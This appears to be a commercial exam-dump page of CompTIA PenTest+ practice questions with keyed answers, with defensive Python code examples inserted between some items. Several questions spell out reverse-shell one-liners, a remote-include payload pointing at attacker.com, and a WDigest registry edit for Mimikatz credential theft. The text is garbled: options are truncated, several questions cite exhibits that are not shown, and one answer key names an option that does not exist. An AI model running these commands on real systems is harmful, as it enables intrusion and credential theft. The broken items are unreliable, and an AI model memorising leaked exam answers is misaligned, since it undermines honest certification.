
CompTIA PT0-001 Exam Questions 2024 Updated: Get Ready for Exams, CompTIA PenTest+ Certification | SPOTO

Prepare for your CompTIA PenTest+ (PT0-001) certification with our 2024 Updated CompTIA PT0-001 Exam Questions. The best way to get ready for your exams is by practicing with the latest exam questions. Our practice tests cover a range of topics and scenarios, including hands-on testing in new environments such as the cloud and mobile platforms, in addition to traditional desktops and servers. By utilizing our exam questions, sample questions, and exam dumps, you'll gain the knowledge and confidence needed to succeed. Our mock exams and exam simulator provide a realistic exam experience to further enhance your preparation. Access our exam materials and exam answers to ensure you're fully prepared for the PT0-001 exam and earn your CompTIA PenTest+ certification with ease.

Question #1
A penetration tester delivers a web application vulnerability scan report to a client. The penetration tester rates a vulnerability as medium severity. The same vulnerability was reported as a critical severity finding on the previous report. Which of the following is the MOST likely reason for the reduced severity?
A. The client has applied a hot fix without updating the version
B. The threat landscape has significantly changed
C. The client has updated their codebase with new features
D. There are currently no known exploits for this vulnerability
View answer
Correct Answer: A
Question #2
A penetration tester is performing initial intelligence gathering on some remote hosts prior to conducting a vulnerability scan. The tester runs the following command: nmap -D 192.168.1.1,192.168.1.2,192.168.1.3 -sV -o --max-rate 2 192.168.1.130 Which of the following BEST describes why multiple IP addresses are specified?
A. The network is subnetted as a/25 or greater, and the tester needed to access hosts on two different subnets
B. The tester is trying to perform a more stealthy scan by including several bogus addresses
C. The scanning machine has several interfaces to balance the scan request across at the specified rate
D. A discovery scan is run on the first set of addresses, whereas a deeper, more aggressive scan is run against the latter host
View answer
Correct Answer: B
Question #3
A penetration tester identifies the following findings during an external vulnerability scan: Which of the following attack strategies should be prioritized from the scan results above?
A. Obsolete software may contain exploitable components
B. Weak password management practices may be employed
C. Cryptographically weak protocols may be intercepted
D. Web server configurations may reveal sensitive information
View answer
Correct Answer: D
Question #4
A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.5. Which of the following commands will test if the VPN is available?
A. fpipe
B. ike-scan -A -t 1 --sourceip=spoof_ip 100
C. nmap -sS -A -f 100
D. nc 100
View answer
Correct Answer: B
Question #5
A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?
A. Enable HTTP Strict Transport Security
B. Enable a secure cookie flag
C. Encrypt the communication channel
D. Sanitize invalid user input
View answer
Correct Answer: C
Question #6
An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used in this attack?
A. Principle of fear
B. Principle of authority
C. Principle of scarcity
D. Principle of likeness
E. Principle of social proof
View answer
Correct Answer: B
Question #7
A security assessor completed a comprehensive penetration test of a company and its networks and systems. During the assessment, the tester identified a vulnerability in the crypto library used for TLS on the company's intranet-wide payroll web application. However, the vulnerability has not yet been patched by the vendor, although a patch is expected within days. Which of the following strategies would BEST mitigate the risk of impact?
A. Modify the web server crypto configuration to use a stronger cipher-suite for encryption, hashing, and digital signing
B. Implement new training to be aware of the risks in accessing the application
C. Implement an ACL to restrict access to the application exclusively to the finance department
D. Require payroll users to change the passwords used to authenticate to the application
View answer
Correct Answer: C
Question #8
A penetration tester has been assigned to perform an external penetration assessment of a company. Which of the following steps would BEST help with the passive-information-gathering process? (Choose two.)
A. Wait outside of the company’s building and attempt to tailgate behind an employee
B. Perform a vulnerability scan against the company’s external netblock, identify exploitable vulnerabilities, and attempt to gain access
C. Use domain and IP registry websites to identify the company’s external netblocks and external facing applications
D. Search social media for information technology employees who post information about the technologies they work with
E. Identify the company’s external facing webmail application, enumerate user accounts and attempt password guessing to gain access
View answer
Correct Answer: CD
Question #9
Given the following script: Which of the following BEST describes the purpose of this script?
A. Log collection
B. Event collection
C. Keystroke monitoring
D. Debug message collection
View answer
Correct Answer: C
Question #10
While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?
A. HKEY_CLASSES_ROOT
B. HKEY_LOCAL_MACHINE
C. HKEY_CURRENT_USER
D. HKEY_CURRENT_CONFIG
View answer
Correct Answer: C
Question #11
A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?
A. Vulnerability scan
B. Dynamic scan
C. Static scan
D. Compliance scan
View answer
Correct Answer: C
Question #12
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).
A. nc 192
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
D. nc -e /bin/sh 192
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
View answer
Correct Answer: CD
Question #13
Given the following: http://example.com/download.php?id=../../../etc/passwd Which of the following BEST describes the above attack?
A. Malicious file upload attack
B. Redirect attack
C. Directory traversal attack
D. Insecure direct object reference attack
View answer
Correct Answer: C
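The payload in this question works because the id parameter is joined onto a base directory and the ../ segments are collapsed before anything checks where the result landed. The following is an added example (not the page's own code) of a download handler modelled on that download.php endpoint, in a naive form and a hardened form; the directory, file name and function names are assumptions for illustration:

```python
import os
import tempfile
from pathlib import Path
from urllib.parse import unquote

# Added example (not the page's code): a file-download handler modelled on the
# download.php?id=... endpoint from the question, in a naive and a hardened form.


def vulnerable_resolve(base_dir: str, user_id: str) -> str:
    """Naive join: the attacker-controlled id is glued onto the base path and
    normpath collapses the ../ segments, so the result leaves base_dir."""
    return os.path.normpath(os.path.join(base_dir, unquote(user_id)))


def safe_resolve(base_dir: str, user_id: str) -> str:
    """Resolve the request (symlinks included) and refuse anything that does
    not land inside base_dir. Decoding happens exactly once, before the check,
    so an encoded ..%2f cannot slip past it."""
    base = Path(base_dir).resolve()
    target = (base / unquote(user_id)).resolve()
    if target != base and base not in target.parents:
        raise PermissionError(f"path traversal rejected: {user_id!r}")
    if not target.is_file():
        raise FileNotFoundError(user_id)
    return str(target)


def _blocked(base_dir: str, user_id: str) -> bool:
    try:
        safe_resolve(base_dir, user_id)
        return False
    except PermissionError:
        return True


def demo() -> dict:
    """Build a throwaway download directory (constructed sample data) and run
    both resolvers against a legitimate id and the payload from the question."""
    base = tempfile.mkdtemp(prefix="downloads-")
    Path(base, "report-42.pdf").write_bytes(b"%PDF-1.4 constructed sample")
    payload = "../../../etc/passwd"
    return {
        "vulnerable_escapes": not vulnerable_resolve(base, payload).startswith(base),
        "safe_serves_legit": safe_resolve(base, "report-42.pdf").endswith("report-42.pdf"),
        "safe_blocks_plain": _blocked(base, payload),
        "safe_blocks_encoded": _blocked(base, "..%2f..%2f..%2fetc%2fpasswd"),
    }


if __name__ == "__main__":
    for check, ok in demo().items():
        print(f"{check}: {ok}")
```

The containment test compares fully resolved paths rather than string prefixes, which also catches a symlink inside the download directory that points outside it.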
Question #14
A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode. Which of the following steps must the firm take before it can run a static code analyzer?
A. Run the application through a dynamic code analyzer
B. Employ a fuzzing utility
C. Decompile the application
D. Check memory allocations
View answer
Correct Answer: C
Question #15
While monitoring WAF logs, a security analyst discovers a successful attack against the following URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php Which of the following remediation steps should be taken to prevent this type of attack?
A. Implement a blacklist
B. Block URL redirections
C. Double URL encode the parameters
D. Stop external calls from the application
View answer
Correct Answer: D
Question #16
A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO).
A. Convert to JAR
B. Decompile
C. Cross-compile the application
D. Convert JAR files to DEX
E. Re-sign the APK
F. Attach to ADB
View answer
Correct Answer: AB
Question #17
A recently concluded penetration test revealed that a legacy web application is vulnerable to SQL injection. Research indicates that completely remediating the vulnerability would require an architectural change, and the stakeholders are not in a position to risk the availability on the application. Under such circumstances, which of the following controls are low-effort, short-term solutions to minimize the SQL injection risk? (Choose two.)
A. Identify and eliminate inline SQL statements from the code
B. Identify and eliminate dynamic SQL from stored procedures
C. Identify and sanitize all user inputs
D. Use a whitelist approach for SQL statements
E. Use a blacklist approach for SQL statements
F. Identify the source of malicious input and block the IP address
View answer
Correct Answer: CD
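The two short-term controls in this question leave the legacy statement untouched and stop bad input in front of it. The following is an added example (not the page's own code) showing a string-built lookup next to those controls, and next to the parameterized query that the long-term fix would use; the table, rows and function names are constructed for illustration:

```python
import re
import sqlite3

# Added example (not the page's code). A legacy lookup that concatenates user
# input into SQL, beside the two short-term controls from the question:
# strict input validation and an allow-list for the one part of a statement
# that cannot be bound as a parameter (an identifier such as a sort column).

USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")
ALLOWED_SORT_COLUMNS = {"id", "name", "created"}


def make_db() -> sqlite3.Connection:
    """In-memory table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, created TEXT);
        INSERT INTO users(name, created) VALUES
            ('alice', '2024-01-01'), ('bob', '2024-02-01'), ('carol', '2024-03-01');
        """
    )
    return conn


def find_user_vulnerable(conn, name: str) -> list:
    """The legacy pattern: the WHERE clause is built by string formatting."""
    sql = f"SELECT name FROM users WHERE name = '{name}'"
    return [row[0] for row in conn.execute(sql)]


def find_user_validated(conn, name: str, sort: str = "id") -> list:
    """Short-term control: reject anything outside a strict allow-list before
    it reaches the legacy statement, and allow-list the sort identifier.
    The query text itself is unchanged, which is the point for an application
    that cannot be refactored yet."""
    if not USERNAME_RE.fullmatch(name):
        raise ValueError(f"rejected username: {name!r}")
    if sort not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"rejected sort column: {sort!r}")
    sql = f"SELECT name FROM users WHERE name = '{name}' ORDER BY {sort}"
    return [row[0] for row in conn.execute(sql)]


def find_user_parameterized(conn, name: str) -> list:
    """The proper fix: bind the value, so the payload is compared as data
    and matches nothing."""
    rows = conn.execute("SELECT name FROM users WHERE name = ?", (name,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    payload = "x' OR '1'='1"
    print("vulnerable:", find_user_vulnerable(db, payload))
    print("parameterized:", find_user_parameterized(db, payload))
    try:
        find_user_validated(db, payload)
    except ValueError as exc:
        print("validated:", exc)
```

Note that the allow-list for the sort column is the only defence available for identifiers, because placeholders can bind values but not column or table names.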
Question #18
During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?
A. Disable the network port of the affected service
B. Complete all findings, and then submit them to the client
C. Promptly alert the client with details of the finding
D. Take the target offline so it cannot be exploited by an attacker
View answer
Correct Answer: C
Question #19
Which of the following commands would allow a penetration tester to access a private network from the Internet in Metasploit?
A. set rhost 192
B. run autoroute -s 192
C. db_nmap -iL /tmp/privatehosts
D. use auxiliary/server/socks4a
View answer
Correct Answer: B
Question #20
A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovering vulnerabilities, the company asked the consultant to perform the following tasks: Code review Updates to firewall settings Which of the following has occurred in this situation?
A. Scope creep
B. Post-mortem review
C. Risk acceptance
D. Threat prevention
View answer
Correct Answer: A
Question #21
A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?
A. TCP SYN flood
B. SQL injection
C. XSS
D. XMAS scan
View answer
Correct Answer: A
Question #22
The following command is run on a Linux file system: chmod 4111 /usr/bin/sudo Which of the following issues may be exploited now?
A. Kernel vulnerabilities
B. Sticky bits
C. Unquoted service path
D. Misconfigured sudo
View answer
Correct Answer: B
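In the mode 4111 the leading octal digit selects the special bits (4 = set-uid, 2 = set-gid, 1 = sticky) and the remaining 111 grants execute only to owner, group and others. The following is an added example (not the page's own code) that decodes such a mode and locates set-uid files the way find / -perm -4000 does; the directory and file names are constructed for illustration:

```python
import os
import stat
import tempfile

# Added example (not the page's code): decode the special permission bits in a
# mode such as 4111 and find set-uid files the way `find / -perm -4000` does.


def decode_mode(mode: int) -> dict:
    """Split a mode into the three special bits and the familiar rwx string.
    The leading octal digit is 4 = set-uid, 2 = set-gid, 1 = sticky."""
    perm = stat.S_IMODE(mode)
    return {
        "octal": format(perm, "04o"),
        "suid": bool(perm & stat.S_ISUID),
        "sgid": bool(perm & stat.S_ISGID),
        "sticky": bool(perm & stat.S_ISVTX),
        "symbolic": stat.filemode(stat.S_IFREG | perm)[1:],  # drop the file-type column
    }


def find_setuid(root: str) -> list:
    """Walk root and return relative paths of regular files carrying the
    set-uid bit. lstat is used so a symlink is reported as a symlink, not as
    whatever it points at."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(os.path.relpath(full, root))
    return sorted(hits)


def demo() -> list:
    """Constructed sample: an empty file with the mode from the question next
    to two ordinary ones, then the scan."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    for name, mode in (("sudo", 0o4111), ("ls", 0o755), ("wall", 0o2755)):
        path = os.path.join(root, name)
        open(path, "wb").close()
        os.chmod(path, mode)
    return find_setuid(root)


if __name__ == "__main__":
    print(decode_mode(0o4111))
    print("set-uid files:", demo())
```

On a real host run find_setuid against / and diff the result against a known-good baseline; a set-uid bit on a binary that is not normally set-uid, or on a script, is the finding worth chasing.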
Question #23
A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising a single workstation. Which of the following mitigation strategies would be BEST to recommend in the report? (Select THREE).
A. Randomize local administrator credentials for each machine
B. Disable remote logons for local administrators
C. Require multifactor authentication for all logins
D. Increase minimum password complexity requirements
E. Apply additional network access control
F. Enable full-disk encryption on every workstation
G. Segment each host into its own VLAN
View answer
Correct Answer: ABE
Question #24
Which of the following BEST explains why it is important to maintain confidentiality of any identified findings when performing a penetration test?
A. Penetration test findings often contain company intellectual property
B. Penetration test findings could lead to consumer dissatisfaction if made public
C. Penetration test findings are legal documents containing privileged information
D. Penetration test findings can assist an attacker in compromising a system
View answer
Correct Answer: D
Question #25
A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect. Which of the following would be the BEST step for penetration?
A. Obtain staff information by calling the company and using social engineering techniques
B. Visit the client and use impersonation to obtain information from staff
C. Send spoofed emails to staff to see if staff will respond with sensitive information
D. Search the internet for information on staff such as social networking sites
View answer
Correct Answer: D
Question #26
Click the exhibit button. Given the Nikto vulnerability, scan output shown in the exhibit, which of the following exploitation techniques might be used to exploit the target system? (Choose two.)
A. Arbitrary code execution
B. Session hijacking
C. SQL injection
D. Login credential brute-forcing
E. Cross-site request forgery
View answer
Correct Answer: BD
Question #27
A tester intends to run the following command on a target system: bash -i >& /dev/tcp/10.2.4.6/443 0>&1 Which of the following additional commands would need to be executed on the tester's Linux system to make the previous command successful?
A. nc -nlvp 443
B. nc 10
C. nc -w3 10
D. nc -e /bin/sh 10
View answer
Correct Answer: A
Question #28
Which of the following commands starts the Metasploit database?
A. msfconsole
B. workspace
C. msfvenom
D. db_init
E. db_connect
View answer
Correct Answer: A
Question #29
A security consultant is trying to attack a device with a previously identified user account. Which of the following types of attacks is being executed?
A. Credential dump attack
B. DLL injection attack
C. Reverse shell attack
D. Pass the hash attack
View answer
Correct Answer: D
Question #30
A software development team recently migrated to new application software on the on-premises environment. Penetration test findings show that multiple vulnerabilities exist. If a penetration tester does not have access to a live or test environment, a test might be better to create the same environment on the VM. Which of the following is MOST important for confirmation?
A. Unsecure service and protocol configuration
B. Running SMB and SMTP service
C. Weak password complexity and user account
D. Misconfiguration
View answer
Correct Answer: A
Question #31
Black box penetration testing strategy provides the tester with:
A. a target list
B. a network diagram
C. source code
D. privileged credentials
View answer
Correct Answer: A
Question #32
A penetration tester is scanning a network for SSH and has a list of provided targets. Which of the following Nmap commands should the tester use?
A. nmap -p 22 -iL targets
B. nmap -p 22 -sL targets
C. nmap -p 22 -oG targets
D. nmap -p 22 -oA targets
View answer
Correct Answer: A
Question #33
If a security consultant comes across a password hash that resembles the following: b117525b345470c29ca3d8ac0b556ba8 Which of the following formats is the correct hash type?
A. Kerberos
B. NetNTLMv1
C. NTLM
D. SHA-1
View answer
Correct Answer: C
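The hash in this question is 32 hexadecimal characters, i.e. 128 bits, which fits NTLM (and MD5) but not SHA-1, whose digests are 40 hex characters; NetNTLMv1 and Kerberos material carry colon-separated or $krb5...$ structure that a bare hex string lacks. The following is an added example (not the page's own code) that classifies a hash by shape and computes NTLM from scratch, since hashlib's MD4 is frequently unavailable under OpenSSL 3; the NetNTLM sample strings in the test are constructed, and the pattern table and function names are assumptions for illustration:

```python
import re
import struct

# Added example (not the page's code). Classifies a hash string by its shape
# the way hashid does, and computes an NTLM hash from scratch to show why NTLM
# and MD5 look identical: both are 128 bits (32 hex characters), while SHA-1 is
# 160 bits (40 hex characters).

PATTERNS = [
    (re.compile(r"[0-9a-fA-F]{32}"), ["NTLM", "MD5"]),
    (re.compile(r"[0-9a-fA-F]{40}"), ["SHA-1"]),
    (re.compile(r"[0-9a-fA-F]{64}"), ["SHA-256"]),
    # user::domain:LMresp(48 hex):NTresp(48 hex):challenge(16 hex), hashcat mode 5500
    (re.compile(r"[^:]+::[^:]*:[0-9a-fA-F]{48}:[0-9a-fA-F]{48}:[0-9a-fA-F]{16}"), ["NetNTLMv1"]),
    # user::domain:challenge(16 hex):NTProofStr(32 hex):blob(hex), hashcat mode 5600
    (re.compile(r"[^:]+::[^:]*:[0-9a-fA-F]{16}:[0-9a-fA-F]{32}:[0-9a-fA-F]+"), ["NetNTLMv2"]),
    (re.compile(r"\$krb5(tgs|asrep)\$.*"), ["Kerberos 5 ticket (TGS-REP / AS-REP)"]),
]


def identify_hash(h: str) -> list:
    """Return the candidate formats for a hash string, most common first."""
    h = h.strip()
    for pattern, names in PATTERNS:
        if pattern.fullmatch(h):
            return names
    return ["unknown"]


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python; hashlib.new('md4') needs OpenSSL's legacy
    provider and is often missing, so the algorithm is written out here."""
    mask = 0xFFFFFFFF
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: (((x & mask) << n) | ((x & mask) >> (32 - n))) & mask

    msg = bytearray(data) + b"\x80"           # padding: 1 bit, zeros, 64-bit length
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)

    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(16):                                                    # round 1
            a = rotl(a + F(b, c, d) + X[i], (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                                    # round 2
            k = (i % 4) * 4 + i // 4
            a = rotl(a + G(b, c, d) + X[k] + 0x5A827999, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)):  # round 3
            a = rotl(a + H(b, c, d) + X[k] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        A, B, C, D = (A + a) & mask, (B + b) & mask, (C + c) & mask, (D + d) & mask
    return struct.pack("<4I", A, B, C, D)


def ntlm_hash(password: str) -> str:
    """NTLM = MD4 over the UTF-16LE encoding of the password, with no salt."""
    return md4(password.encode("utf-16-le")).hex()


if __name__ == "__main__":
    print(identify_hash("b117525b345470c29ca3d8ac0b556ba8"))   # the hash from the question
    print(ntlm_hash("password"))
```

Because NTLM is unsalted MD4 of the password, two accounts with the same password share a hash, and a captured NTLM hash can be replayed directly (pass-the-hash) without cracking it; NetNTLMv1/v2 responses, by contrast, are challenge-bound and must be cracked or relayed.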
Question #34
An engineer who is conducting a penetration test for a web application discovers that the user login process sends form field data using the HTTP GET method. To mitigate the risk of exposing sensitive information, the form should be sent using an:
A. HTTP POST method
B. HTTP OPTIONS method
C. HTTP PUT method
D. HTTP TRACE method
View answer
Correct Answer: A
Question #35
After performing a security assessment for a firm, the client was found to have been billed for the time the client’s test environment was unavailable. The client claims to have been billed unfairly. Which of the following documents would MOST likely be able to provide guidance in such a situation?
A. SOW
B. NDA
C. EULAD
View answer
Correct Answer: D
Question #36
Which of the following are MOST important when planning for an engagement? (Select TWO).
A. Goals/objectives
B. Architectural diagrams
C. Tolerance to impact
D. Storage time for a report
E. Company policies
View answer
Correct Answer: AC
Question #37
Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?
A. Stack pointer register
B. Instruction pointer register
C. Stack base pointer
D. Destination index register
View answer
Correct Answer: B
Question #38
A penetration tester runs the following on a compromised host: python -c 'import pty;pty.spawn("/bin/bash")'. Which of the following actions is the tester taking?
A. Removing the Bash history
B. Upgrading the shell
C. Creating a sandbox
D. Capturing credentials
View answer
Correct Answer: B
Question #39
A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?
A. dsrm -users “DN=company
B. dsuser -name -account -limit 3
C. dsquery user -inactive 3
D. dsquery -o -rdn -limit 21
View answer
Correct Answer: C
Question #40
A penetration tester is attempting to capture a handshake between a client and an access point by monitoring a WPA2-PSK secured wireless network. The tester is monitoring the correct channel for the identified network, but has been unsuccessful in capturing a handshake. Given the scenario, which of the following attacks would BEST assist the tester in obtaining this handshake?
A. Karma attack
B. Deauthentication attack
C. Fragmentation attack
D. SSID broadcast flood
View answer
Correct Answer: B
Question #41
A penetration tester ran the following Nmap scan on a computer: nmap -sV 192.168.1.5 The organization said it had disabled Telnet from its environment. However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH. Which of the following is the BEST explanation for what happened?
A. The organization failed to disable Telnet
B. Nmap results contain a false positive for port 23
C. Port 22 was filtered
D. The service is running on a non-standard port
View answer
Correct Answer: D
Question #42
Which of the following is an example of a spear phishing attack?
A. Targeting an executive with an SMS attack
B. Targeting a specific team with an email attack
C. Targeting random users with a USB key drop
D. Targeting an organization with a watering hole attack
View answer
Correct Answer: B
Question #43
A penetration tester wants to check manually if a “ghost” vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?
A. Download the GHOST file to a Linux system and compile gcc -o GHOST test i:
B. Download the GHOST file to a Windows system and compile gcc -o GHOST GHOST
C. Download the GHOST file to a Linux system and compile gcc -o GHOST
D. Download the GHOST file to a Windows system and compile gcc -o GHOST test i:
View answer
Correct Answer: C
Question #44
A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the below code and output: Which of the following is the tester intending to do?
A. Horizontally escalate privileges
B. Scrape the page for hidden fields
C. Analyze HTTP response code
D. Search for HTTP headers
View answer
Correct Answer: D
Question #45
Which of the following would be the BEST for performing passive reconnaissance on a target’s external domain?
A. Peach
B. CeWL
C. OpenVAS
D. Shodan
View answer
Correct Answer: D
Question #46
During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz. Which of the following registry changes would allow for credential caching in memory?
A. reg add HKLM\System\ControlSet002\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0
B. reg add HKCU\System\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
C. reg add HKLM\Software\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
D. reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
View answer
Correct Answer: D
Question #47
At the beginning of a penetration test, the tester finds a file that includes employee data, such as email addresses, work phone numbers, computers names, and office locations. The file is hosted on a public web server. Which of the following BEST describes the technique that was used to obtain this information?
A. Enumeration of services
B. OSINT gathering
C. Port scanning
D. Social engineering
View answer
Correct Answer: B
